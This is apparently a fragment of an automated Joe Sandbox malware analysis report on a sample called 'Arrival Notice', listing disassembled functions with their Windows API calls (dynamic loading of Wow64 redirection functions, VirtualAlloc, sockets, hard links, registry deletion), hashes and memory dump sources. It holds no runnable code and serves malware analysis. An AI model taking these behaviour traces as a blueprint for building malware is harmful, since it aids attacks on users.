                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: ba78da16905792386daccdbe642801199c71156d84d9f919879b45ab4c6238b9
                                              • Instruction ID: d8ea52db55cc0bfb9b443ea8c6986a503507d9acc1f26e16da86a86d7e3527a2
                                              • Opcode Fuzzy Hash: ba78da16905792386daccdbe642801199c71156d84d9f919879b45ab4c6238b9
                                              • Instruction Fuzzy Hash: 4B21E232514219BBDF11CFA5DC46FEB3B79EF88724F110214FE15AB1D0D6B1A8549BA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00956FAA
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00956FBA
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00956FDF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 0284565c55879bd3b9d737a908711dfec0da0751d0237941fde9203e2497d141
                                              • Instruction ID: 667fe6bb97883ceabdbb6e17788b1050a7a28e6f2db3f9cec332ffd45476e885
                                              • Opcode Fuzzy Hash: 0284565c55879bd3b9d737a908711dfec0da0751d0237941fde9203e2497d141
                                              • Instruction Fuzzy Hash: 7921F232A10218BFEF11CF55EC84FAB3BAEEF89765F418124FD049B190C671AC158BA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009579E1
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009579F6
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00957A03
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: 72245ff50da9fb2998e0cdc7a71570152c759c9ec6f41aa03deeaa5f3f8276c6
                                              • Instruction ID: 1a5e7048cab3a70798ef498ca733c3d916215d01bfcedfefa4c235e62cac42f3
                                              • Opcode Fuzzy Hash: 72245ff50da9fb2998e0cdc7a71570152c759c9ec6f41aa03deeaa5f3f8276c6
                                              • Instruction Fuzzy Hash: A211E332254208BAEF109FB6DC05FAB77ADEFC9B65F010519FA41A6090D271E811DB60
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008D4C2E), ref: 008D4CA3
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008D4CB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: eb81768c771114ba3439b07db9d204913eef73d85811d9c5a2fbac6ed5782c5f
                                              • Instruction ID: 3bced59d69797077790ba5dd3992cb326921d865eb115b6a8014a9ff29181b9b
                                              • Opcode Fuzzy Hash: eb81768c771114ba3439b07db9d204913eef73d85811d9c5a2fbac6ed5782c5f
                                              • Instruction Fuzzy Hash: 1ED01731524B23CFD7209F32DA28A0677E9EF057A6F11883A988AD6250E670D884CB51
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008D4CE1,?), ref: 008D4DA2
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008D4DB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: 00766311015ce71f030ca163bcc9168f15e4d3762f06eb8e5f956c1d3ae8646f
                                              • Instruction ID: 76c8c10c3be61cf3a9e7974b474de784b24cc4886de712c1832a033e9e0dfe27
                                              • Opcode Fuzzy Hash: 00766311015ce71f030ca163bcc9168f15e4d3762f06eb8e5f956c1d3ae8646f
                                              • Instruction Fuzzy Hash: 8FD01731568B13CFD720AF72D818A46B7E5EF0536AF21883AD8D6D6250E770D884CB50
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008D4D2E,?,008D4F4F,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4D6F
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008D4D81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 56f210fb60b3219de310e7f8e6f1aa241f5ee80c55a22da3c60bb552fe17a8a4
                                              • Instruction ID: 9d10dff14b8222de2707dda598fc1d7056d158c93f86f5bfc5b7af3796f30cb7
                                              • Opcode Fuzzy Hash: 56f210fb60b3219de310e7f8e6f1aa241f5ee80c55a22da3c60bb552fe17a8a4
                                              • Instruction Fuzzy Hash: 3BD01730528B13CFD720AF72D818616B7E9FF15376F21893A9896D6350E670D880CB60
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,009512C1), ref: 00951080
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00951092
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: babcdfdf6de20d7fdc399a2d85ea7fe8f882cd7116170af055563894fc8ddfde
                                              • Instruction ID: 91598db695000a3e4a06a52ed3280a3414a3697fa3d89bc1d70670e54670bb77
                                              • Opcode Fuzzy Hash: babcdfdf6de20d7fdc399a2d85ea7fe8f882cd7116170af055563894fc8ddfde
                                              • Instruction Fuzzy Hash: A6D01230514712CFD720AF36D86861A76E8AF553A6B158C3DA8D5D7290D770C4C0C750
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00949009,?,0095F910), ref: 00949403
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00949415
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: 2d9588faa3fae8d6b668994ab8db4b97ef65c1e632a0be8f8e816af476a2951f
                                              • Instruction ID: 02a92b2146dab6d07efaa9f10d911db4edfbe48560a35bc0d4d471efd0ed740a
                                              • Opcode Fuzzy Hash: 2d9588faa3fae8d6b668994ab8db4b97ef65c1e632a0be8f8e816af476a2951f
                                              • Instruction Fuzzy Hash: 1ED01234518723CFD7209F32D91D90776D9AF05366F11C83A94D5D6560DA70C480D751
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: 60480a1a38e94eaceadca0076ea2bc4eca6beb1872a6ddf6c55d8564ba0ee6ba
                                              • Instruction ID: acde5a8c40393bf53db9feef0c735704ce957bc3239394d61e660e27e24bad8c
                                              • Opcode Fuzzy Hash: 60480a1a38e94eaceadca0076ea2bc4eca6beb1872a6ddf6c55d8564ba0ee6ba
                                              • Instruction Fuzzy Hash: 2CD0ECB195811CFACA449A9098448FA737CB704311F5009A2F602D1544F2289BC4EB25
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e13b252062d31f95caec5efd70f0bf9efa69a325177365a7fbf78e384e880d57
                                              • Instruction ID: c1d71467a96dcf16717e311c4563b510a0b49530943ad153b4a6af46e47d09c1
                                              • Opcode Fuzzy Hash: e13b252062d31f95caec5efd70f0bf9efa69a325177365a7fbf78e384e880d57
                                              • Instruction Fuzzy Hash: B7C16D79A04226EFCB14CF94D884EAEF7B9FF48710B118599E805EB255D730ED81CB90
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 0094E3D2
                                              • CharLowerBuffW.USER32(?,?), ref: 0094E415
                                                • Part of subcall function 0094DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0094DAD9
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0094E615
                                              • _memmove.LIBCMT ref: 0094E628
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: bf14680c49395032a09d7b62691e61ae12bb8667c1aac3be667b82821edaf145
                                              • Instruction ID: 865d22332ffcae3a00bc09d330aa6b4aa8a2d00af2c4836fe5108c8ba9711165
                                              • Opcode Fuzzy Hash: bf14680c49395032a09d7b62691e61ae12bb8667c1aac3be667b82821edaf145
                                              • Instruction Fuzzy Hash: 54C126716083119FCB14DF28C490A6ABBE4FF88714F14896EF999DB351E731E946CB82
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 009483D8
                                              • CoUninitialize.OLE32 ref: 009483E3
                                                • Part of subcall function 0092DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DAC5
                                              • VariantInit.OLEAUT32(?), ref: 009483EE
                                              • VariantClear.OLEAUT32(?), ref: 009486BF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: c7ecae4bee786f68ab40719728166da85e284534f8b11f46e597f125bf90dca3
                                              • Instruction ID: 2038cbc398a21e020b354cdb874455b7820fd11653e438ff53cddcb8070d7375
                                              • Opcode Fuzzy Hash: c7ecae4bee786f68ab40719728166da85e284534f8b11f46e597f125bf90dca3
                                              • Instruction Fuzzy Hash: 55A1F475204711AFCB10EF28C495E2ABBE5FF88314F154959F99A9B3A2CB34ED44CB42
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C32
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C4A
                                              • CLSIDFromProgID.OLE32(?,?,00000000,0095FB80,000000FF,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C6F
                                              • _memcmp.LIBCMT ref: 00927C90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: cdf9de91238fe829cf54f96888a36abbd14cb328a6591c089ae5021a9fde7689
                                              • Instruction ID: dfec31bcd41f31adaaf921c43d4ec5a4f4a0e3665480dc11453942d02a2e906d
                                              • Opcode Fuzzy Hash: cdf9de91238fe829cf54f96888a36abbd14cb328a6591c089ae5021a9fde7689
                                              • Instruction Fuzzy Hash: 30811771A00119EFCB00DFE4C884EAEB7B9FF89315F204599E506BB254DB31AE06CB61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 7b40ca8add096d088587859b6ac17547dc04b6367281e90a6311b6392b9901ca
                                              • Instruction ID: 89a8766e89b0864bf2c6d30c9e953607b2736108e256c738fd3bdceb0f27eb41
                                              • Opcode Fuzzy Hash: 7b40ca8add096d088587859b6ac17547dc04b6367281e90a6311b6392b9901ca
                                              • Instruction Fuzzy Hash: 0451FA306483119EDB30AFA9F491B7AF3E9EF49310F208C1FE596D7695DB3498449B01
                                              APIs
                                              • GetWindowRect.USER32(01570690,?), ref: 00959AD2
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00959B05
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00959B72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 7678cff716fac743c8e80b0f6cdeffc9cb49adca38841907c5f1320626cb10ea
                                              • Instruction ID: da719275b2388c5b9bd3c3a42db86dca27a58252d111f25e0e5d31a0bb865070
                                              • Opcode Fuzzy Hash: 7678cff716fac743c8e80b0f6cdeffc9cb49adca38841907c5f1320626cb10ea
                                              • Instruction Fuzzy Hash: 0E514F34A00209EFEF10DF69E980AAE7BBAFF55361F148259FC159B290D730AD45DB90
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00946CE4
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00946CF4
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00946D58
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00946D64
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              • Opcode ID: 45b858cefe0764f54f909291d2ac5aa1d992afb107a5a22523772b5ba738476f
                                              • Instruction ID: 3b731d2c1efa7e1caf5542c00606a6b20a45f2234a97ad0f71b5bf55c4bd3868
                                              • Opcode Fuzzy Hash: 45b858cefe0764f54f909291d2ac5aa1d992afb107a5a22523772b5ba738476f
                                              • Instruction Fuzzy Hash: 7C41B475740210AFEB10AF28DC86F3A77E9EB44B24F448519FA59DB3D2DB709C008B92
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0095F910), ref: 009467BA
                                              • _strlen.LIBCMT ref: 009467EC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: 491657f5086816cf3383b33163c7dda65add704adc9cc4f83b57615df9d4b254
                                              • Instruction ID: d4eaeeaeee38ae14acbbaf48949b48c854e7b0864beb2741895cf90542402c7d
                                              • Opcode Fuzzy Hash: 491657f5086816cf3383b33163c7dda65add704adc9cc4f83b57615df9d4b254
                                              • Instruction Fuzzy Hash: E4418071A00214ABCB14EB68DCD5FAEB7A9EF49314F148266F91697392DB30AD01CB52
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0093BB09
                                              • GetLastError.KERNEL32(?,00000000), ref: 0093BB2F
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0093BB54
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0093BB80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: 164f9bfe9fcd1c64347448062300bbcf2c50f85a559a8c3993058bbf7a80a071
                                              • Instruction ID: 756979e02bdf42f23b05415bc9c019313bb9f7bb54907dee682be9b7db5ecdac
                                              • Opcode Fuzzy Hash: 164f9bfe9fcd1c64347448062300bbcf2c50f85a559a8c3993058bbf7a80a071
                                              • Instruction Fuzzy Hash: 42411A39200610EFCB10EF19C594A59BBE1FF49320F099499F98A9B362CB34FD01DB92
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00958B4D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
